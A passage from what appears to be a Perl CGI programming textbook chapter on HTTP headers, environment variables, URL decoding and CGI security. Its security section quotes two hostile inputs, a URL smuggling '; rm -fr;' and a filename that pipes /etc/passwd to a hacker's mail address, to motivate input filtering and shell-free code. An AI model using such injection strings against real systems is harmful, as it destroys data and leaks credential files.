<TR><TD WIDTH=166>Text</TD><TD WIDTH=238>Content-type: text/plain

</TD></TR>

<TR><TD WIDTH=166>HTML page</TD><TD WIDTH=238>Content-type: text/html

</TD></TR>

<TR><TD WIDTH=166>GIF graphic</TD><TD WIDTH=238>Content-type: image/gif

</TD></TR>

<TR><TD WIDTH=166>Redirection to another Web page</TD><TD WIDTH=238>Location: http://www.foobar.com

</TD></TR>

<TR><TD WIDTH=166>Cookie</TD><TD WIDTH=238>Set-cookie: ...</TD>

</TR>

<TR><TD WIDTH=166>Error Message</TD><TD WIDTH=238>Status: 402 

</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

All HTTP headers must be followed by a blank line. Use the following

line of code as a template:

<BLOCKQUOTE>

<PRE>

print(&quot;Content-type: text/html\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

Notice that the HTTP header is followed by <I>two</I> newline

characters. This is very important. It ensures that a blank line

will always follow the HTTP header.
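<P>
As a minimal sketch of that rule, the header and its blank line can be
built in one place so that the second newline is never forgotten. The
<TT>httpHeader()</TT> function is a hypothetical helper, not one of this
book's listings.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical helper: returns a complete header block for the given
# MIME type. The second newline produces the required blank line.
sub httpHeader {
    my($mimeType) = @_;
    return(&quot;Content-type: $mimeType\n\n&quot;);
}

print(httpHeader('text/html'));
print(&quot;&lt;HTML&gt;&lt;BODY&gt;&lt;P&gt;Hello, World!&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;\n&quot;);
</PRE>
</BLOCKQUOTE>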

<P>

If you have installed any helper applications for Netscape or

are familiar with MIME types, you already recognize the <TT>text/plain</TT>

and <TT>text/html</TT> parts of the

<TT>Content-type</TT> header. They

tell the remote Web browser what type of information you are sending.

The two most common MIME types to use are <TT>text/plain</TT>

and <TT>text/html</TT>.

<P>

The <TT>Location</TT> header is used

to redirect the client Web browser to another Web page. For example,

let's say that your CGI script is designed to randomly choose

from among 10 different URLs in order to determine the next Web

page to display. Once the new Web page is chosen, your program

outputs it like this:

<BLOCKQUOTE>

<PRE>

print(&quot;Location: $nextPage\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

Once the <TT>Location</TT> header

has been printed, nothing else should be printed. That is all

the information that the client Web browser needs.
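<P>
The random choice described above might be sketched as follows. The
URLs in <TT>@pages</TT> and the <TT>pickPage()</TT> function are
hypothetical; only three pages are shown to keep the example short.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical list of candidate pages; replace with your own URLs.
my(@pages) = (
    'http://www.foobar.com/one.htm',
    'http://www.foobar.com/two.htm',
    'http://www.foobar.com/three.htm',
);

# Returns one element of the list passed in, chosen at random.
sub pickPage {
    my(@list) = @_;
    return($list[int(rand(scalar(@list)))]);
}

my($nextPage) = pickPage(@pages);

# The Location header is the whole response; nothing follows it.
print(&quot;Location: $nextPage\n\n&quot;);
</PRE>
</BLOCKQUOTE>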

<P>

Cookies and the <TT>Set-cookie:</TT>

header are discussed in the &quot;Cookies&quot; section later

in this chapter.

<P>

The last type of HTTP header is the <TT>Status</TT>

header. This header should be sent when an error arises in your

script that your program is not equipped to handle. I feel that

this HTTP header should not be used unless you are under severe

time pressure to complete a project. You should try to create

your own error handling routines that display a full Web page

that explains the error that happened and what the user can do

to fix or circumvent it. You might include the time, date, type

of error, contact names and phone numbers, and any other information

that might be useful to the user. Relying on the standard error

messages of the Web server and browser will make your Web site

less user friendly.
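<P>
One possible shape for such an error handling routine is sketched
below. The <TT>errorPage()</TT> function, its wording, and the contact
address are assumptions made for illustration. Any text that came from
the user should be escaped before it is placed in the page.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical helper: builds a complete HTML error page as a string.
# $contact is whatever address or phone number you want to show.
sub errorPage {
    my($message, $contact) = @_;
    my($when) = scalar(localtime());

    return(&quot;Content-type: text/html\n\n&quot; .
           &quot;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Error&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;\n&quot; .
           &quot;&lt;H1&gt;Sorry, something went wrong&lt;/H1&gt;\n&quot; .
           &quot;&lt;P&gt;$message&lt;/P&gt;\n&quot; .
           &quot;&lt;P&gt;Time of error: $when&lt;/P&gt;\n&quot; .
           &quot;&lt;P&gt;Please contact $contact for help.&lt;/P&gt;\n&quot; .
           &quot;&lt;/BODY&gt;&lt;/HTML&gt;\n&quot;);
}

print(errorPage('The data file could not be opened.',
                'webmaster@foo.com'));
</PRE>
</BLOCKQUOTE>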

<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>

CGI and Environment Variables</FONT></A></H2>

<P>

You are already familiar with environment variables if you read

<A HREF="ch12.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch12.htm" >Chapter 12</A>, &quot;Using Special Variables.&quot; When your CGI

program is started, the Web server creates and initializes a number

of environment variables that your program can access using the

<TT>%ENV</TT> hash.

<P>

Table 19.2 contains a short description of each environment variable.

A complete description of the environmental variables used in

CGI programs can be found at

<BLOCKQUOTE>

<PRE>

http://www.ast.cam.ac.uk/~drtr/cgi-spec.html

<BR>



</PRE>

</BLOCKQUOTE>

<P>

<CENTER><B>Table 19.2&nbsp;&nbsp;CGI Environment Variables</B></CENTER>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I>

</TD></TR>

<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if authentication was used to access your script.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A 
HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; for more information.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can 
assume a value of <TT>application/octet-stream</TT>. 

</TD></TR>

<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.

</TD></TR>

<TR><TD WIDTH=199>HTTP_ACCEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file.

</TD></TR>

<TR><TD WIDTH=199>HTTP_FROM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.

</TD></TR>

<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.

</TD></TR>

<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.

</TD></TR>

<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.

</TD></TR>

<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script. 

</TD></TR>

<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either &quot;GET&quot; or &quot;POST&quot;, the method by which form information will be made available to your script. See <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; 
for more information.

</TD></TR>

<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.

</TD></TR>

<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.

</TD></TR>

<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.

</TD></TR>

</TABLE>

</CENTER>
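<P>
A short sketch of reading a few of these variables through
<TT>%ENV</TT> follows. Because many of the variables are optional, the
hypothetical <TT>envValue()</TT> function substitutes a placeholder
when the server has not set one.
<BLOCKQUOTE>
<PRE>
use strict;

# Returns the value of a CGI environment variable, or a placeholder
# when the server did not set it (many of them are optional).
sub envValue {
    my($name) = @_;
    return(defined($ENV{$name}) ? $ENV{$name} : '(not set)');
}

print(&quot;Content-type: text/plain\n\n&quot;);
foreach my $name ('REQUEST_METHOD', 'QUERY_STRING', 'REMOTE_ADDR',
                  'HTTP_USER_AGENT', 'SERVER_NAME', 'SERVER_PORT') {
    print(&quot;$name = &quot;, envValue($name), &quot;\n&quot;);
}
</PRE>
</BLOCKQUOTE>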

<P>

<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>

URL Encoding</FONT></A></H2>

<P>

One of the limitations that the WWW organizations have placed

on the HTTP protocol is that the content of the commands, responses,

and data that are passed between client and server should be clearly

defined. It is sometimes difficult to tell simply from the context

whether a space character is a field delimiter or an actual space

character to add whitespace between two words.

<P>

To clear up the ambiguity, the URL encoding scheme was created.

Any spaces are converted into plus (<TT>+</TT>)

signs to avoid semantic ambiguities. In addition, special characters

or 8-bit values are converted into their hexadecimal equivalents

and prefaced with a percent sign (<TT>%</TT>).

For example, the string <TT>Davy Jones &lt;dj@planet.net&gt;</TT>

is encoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.

If you look closely, you see that the <TT>&lt;</TT>

character has been converted to <TT>%3C</TT>

and the <TT>&gt;</TT> character has

been converted to <TT>%3E</TT>.
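<P>
The encoding direction can be sketched in a few lines. The
<TT>encodeURL()</TT> function is hypothetical, and the set of
characters it leaves alone (letters, digits, and <TT>_ . - @</TT>) is
an assumption chosen to match the example above; other encoders may
also convert the <TT>@</TT> character.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical helper: URL encodes a string.
sub encodeURL {
    my($text) = @_;

    # Replace every character outside the assumed safe set (and
    # other than a space) with a percent sign and two hex digits.
    $text =~ s/([^A-Za-z0-9_.\@ -])/sprintf('%%%02X', ord($1))/eg;

    # Spaces become plus signs. A literal plus sign was already
    # converted to %2B by the previous step.
    $text =~ tr/ /+/;

    return($text);
}

print(encodeURL('Davy Jones &lt;dj@planet.net&gt;'), &quot;\n&quot;);
</PRE>
</BLOCKQUOTE>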

<P>

Your CGI script will need to be able to convert URL-encoded information

back into its normal form. Fortunately, Listing 19.2 contains

a function that will decode a URL-encoded string.

<P>

<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>decodeURL()</I></TT><I>

function.<BR>

Get the encoded string from the parameter array.<BR>

Translate all plus signs into spaces.<BR>

Convert characters coded as hexadecimal digits into regular characters.

<BR>

Return the decoded string.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.2&nbsp;&nbsp;19LST02.PL-How to Decode the URL Encoding

<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

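sub decodeURL {

    local($_) = shift;    # work on a private copy of $_

    tr/+/ /;              # plus signs stand for spaces

    # Turn each %XX pair of hexadecimal digits back into one character.
    s/%([0-9A-Fa-f]{2})/pack('C', hex($1))/eg;

    return($_);

}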

</PRE>

</BLOCKQUOTE>

<HR>

<P>

This function will be used in <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot;

to decode form information. It is presented here because canned

queries also use URL encoding.
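<P>
As a rough sketch of how the decoding step might be applied to a query
string, the following example splits the string into fields first and
decodes each piece afterward. The <TT>parseQuery()</TT> function and
the sample query are hypothetical, and the decoding logic is repeated
so that the example stands alone.
<BLOCKQUOTE>
<PRE>
use strict;

# Decoding logic repeated here so the sketch is self-contained.
sub decodeURL {
    my($text) = @_;
    $text =~ tr/+/ /;
    $text =~ s/%([0-9A-Fa-f]{2})/pack('C', hex($1))/eg;
    return($text);
}

# Hypothetical helper: splits &quot;name=value&amp;name=value&quot; into a hash.
# Splitting happens before decoding so that an encoded ampersand or
# equal sign inside a value is not mistaken for a delimiter.
sub parseQuery {
    my($query) = @_;
    my(%fields);

    foreach my $pair (split(/&amp;/, $query)) {
        next if $pair eq '';
        my($name, $value) = split(/=/, $pair, 2);
        $value = '' unless defined($value);
        $fields{decodeURL($name)} = decodeURL($value);
    }
    return(%fields);
}

my(%fields) = parseQuery('name=Davy+Jones&amp;email=%3Cdj@planet.net%3E');
print(&quot;$fields{'name'} $fields{'email'}\n&quot;);
</PRE>
</BLOCKQUOTE>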

<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>

Security</FONT></A></H2>

<P>

CGI really has only one large security hole that I can see. If

you pass information that came from a remote site to an operating

system command, you are asking for trouble. I think an example

is needed to understand the problem because it is not obvious.

<P>

Suppose that you had a CGI script that formatted a directory listing

and generated a Web page that let visitors view the listing. In

addition, let's say that the name of the directory to display

was passed to your program using the <TT>PATH_INFO</TT>

environment variable. The following URL could be used to call

your program:

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/docs

</PRE>

</BLOCKQUOTE>

<P>

Inside your program, the <TT>PATH_INFO</TT>

environment variable is set to <TT>docs</TT>.

In order to get the directory listing, all that is needed is a

call to the <TT>ls</TT> command in

UNIX or the <TT>dir</TT> command in

DOS. Everything looks good, right?

<P>

But what if the program was invoked with this URL?

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;

</PRE>

</BLOCKQUOTE>

<P>

Now, all of a sudden, you are faced with the possibility of files

being deleted because the semi-colon (;) lets multiple commands

be executed on one command line.

<P>

This same type of security hole is possible any time you try to

run an external command. You might be tempted to use the <TT>mail</TT>,

<TT>sendmail</TT>, or <TT>grep</TT>

commands to save time while writing your CGI program, but because

all of these programs are easily duplicated using Perl, try to

resist the temptation.
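<P>
For the directory listing example, one way to avoid the shell entirely
is sketched below using Perl's own <TT>opendir()</TT> and
<TT>readdir()</TT> functions. The base directory and the function
names are hypothetical, and the sketch assumes that the server may
place a leading slash in <TT>PATH_INFO</TT>.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical base directory; only its subdirectories may be listed.
my($baseDir) = '/usr/local/web/docs';

# Returns true only for simple names made of letters, digits,
# underscores, hyphens, and periods (and not &quot;.&quot; or &quot;..&quot;).
sub isSafeName {
    my($name) = @_;
    return(0) if !defined($name) || $name eq '.' || $name eq '..';
    return($name =~ /^[A-Za-z0-9_.-]+\z/ ? 1 : 0);
}

# Returns the sorted file names in $dir without starting a shell.
sub listDirectory {
    my($dir) = @_;
    opendir(DIR, $dir) or return();
    my(@names) = sort(grep { !/^\.\.?$/ } readdir(DIR));
    closedir(DIR);
    return(@names);
}

my($request) = defined($ENV{'PATH_INFO'}) ? $ENV{'PATH_INFO'} : '';
$request =~ s!^/!!;     # drop a leading slash if there is one

print(&quot;Content-type: text/plain\n\n&quot;);
if (isSafeName($request)) {
    print(join(&quot;\n&quot;, listDirectory(&quot;$baseDir/$request&quot;)), &quot;\n&quot;);
}
else {
    print(&quot;That directory cannot be listed.\n&quot;);
}
</PRE>
</BLOCKQUOTE>
<P>
Because no operating system command is run, a request such as
<TT>; rm -fr;</TT> is simply rejected as an invalid name.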

<P>

Another security hole is related to using external data to open

or create files. Some enterprising hacker could use <TT>&quot;|

mail hacker@hacker.com &lt; /etc/passwd&quot;</TT> as the

filename to mail your password file or any other file to himself.
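<P>
A sketch of one defense is shown below. It assumes Perl 5.6 or later,
where <TT>open()</TT> accepts the mode as a separate argument, so the
filename is never interpreted as a command. The data directory and the
<TT>readDataFile()</TT> function are hypothetical.
<BLOCKQUOTE>
<PRE>
use strict;

# Hypothetical directory that holds the files visitors may read.
my($dataDir) = '/usr/local/web/data';

# Reads $name from $dir only if it is a plain file name. The
# three-argument form of open() never treats the name as a command,
# even if it contains a pipe character.
sub readDataFile {
    my($dir, $name) = @_;
    return() unless $name =~ /^[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;

    open(my $fh, '&lt;', &quot;$dir/$name&quot;) or return();
    my(@lines) = &lt;$fh&gt;;
    close($fh);
    return(@lines);
}

my(@lines) = readDataFile($dataDir, 'notes.txt');
print(&quot;Content-type: text/plain\n\n&quot;, @lines);
</PRE>
</BLOCKQUOTE>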

<P>

All of these security holes can be avoided by removing the dangerous

characters (like the | or pipe character).

<P>

<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>improveSecurity()</I></TT><I>

function.<BR>

Copy the passed string into </I><TT><I>$_</I></TT><I>,

the default search space.<BR>

Protect against command-line options by removing a run of </I><TT><I>-</I></TT><I>

characters.

<BR>

Additional protection against command-line options.<BR>

Convert all dangerous characters into harmless underscores.<BR>

Return the </I><TT><I>$_</I></TT><I>

variable.</I>

</BLOCKQUOTE>

<P>

Listing 19.3 shows how to remove dangerous characters.

<HR>

<BLOCKQUOTE>

<B>Listing 19.3&nbsp;&nbsp;19LST03.PL-How to Remove Dangerous

Characters<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

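sub improveSecurity {

    local($_) = shift;    # work on a private copy of $_

    s/\-+(.*)/$1/g;                 # drop a run of hyphens

    s/(.*)[ \t]+\-(.*)/$1$2/g;      # drop whitespace plus a hyphen

    # Replace shell metacharacters with underscores.
    tr/\$\'\`\&quot;\&lt;\&gt;\/\;\!\|/_/;

    return($_);

}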

</PRE>

</BLOCKQUOTE>

<HR>
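<P>
To see the effect of this kind of filtering, the sketch below applies
the same substitutions to the two hostile strings mentioned earlier.
The function is repeated under the hypothetical name
<TT>cleanInput()</TT> so that the example stands alone.
<BLOCKQUOTE>
<PRE>
use strict;

# Same substitutions as improveSecurity(), repeated for this sketch.
sub cleanInput {
    my($text) = @_;
    $text =~ s/\-+(.*)/$1/g;
    $text =~ s/(.*)[ \t]+\-(.*)/$1$2/g;
    $text =~ tr/\$\'\`\&quot;\&lt;\&gt;\/\;\!\|/_/;
    return($text);
}

foreach my $input ('; rm -fr;',
                   '| mail hacker@hacker.com &lt; /etc/passwd') {
    print(&quot;[$input] becomes [&quot;, cleanInput($input), &quot;]\n&quot;);
}
</PRE>
</BLOCKQUOTE>
<P>
The semicolons, pipe, slashes, and angle bracket all become
underscores, so the strings can no longer start a second command or
open a pipe.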

<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>

CGIwrap and Security</FONT></A></H2>

<P>

CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based

utility written by Nathan Neulinger that lets general users run

CGI scripts without needing access to the server's <TT>cgi-bin</TT>

directory. Normally, all scripts must be located in the server's

main <TT>cgi-bin</TT> directory and

all run with the same UID (user ID) as the Web server. CGIwrap

performs various security checks on the scripts before changing

ID to match the owner of the script. All scripts are executed

with the same user ID as the user who owns them. CGIwrap works

with NCSA, Apache, CERN, Netsite, and probably any other UNIX

Web server.

<P>

Any files created by a CGI program are normally owned by the Web

server. This can cause a problem if you need to edit or remove

files created by CGI programs. You might have to ask the system

administrator for help because you lack the proper authorization.

All CGI programs have the same system permissions as the Web server.

If you run your Web server under the root user ID (being either

very brave or very foolish), a CGI program could be tricked into

erasing the entire hard drive. CGIwrap provides a way around these

problems.
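<P>
If you are unsure which user your scripts run as, a small diagnostic
script along the following lines can report it. This is only a sketch:
the <TT>userName()</TT> function is hypothetical, and
<TT>getpwuid()</TT> is available on UNIX systems only.
<BLOCKQUOTE>
<PRE>
use strict;

# Returns the login name for a numeric user ID, or the number itself
# when no name can be found.
sub userName {
    my($uid) = @_;
    my($name) = getpwuid($uid);
    return(defined($name) ? $name : $uid);
}

print(&quot;Content-type: text/plain\n\n&quot;);
print(&quot;Real user ID:      &quot;, userName($&lt;), &quot;\n&quot;);
print(&quot;Effective user ID: &quot;, userName($&gt;), &quot;\n&quot;);
</PRE>
</BLOCKQUOTE>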

<P>

With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>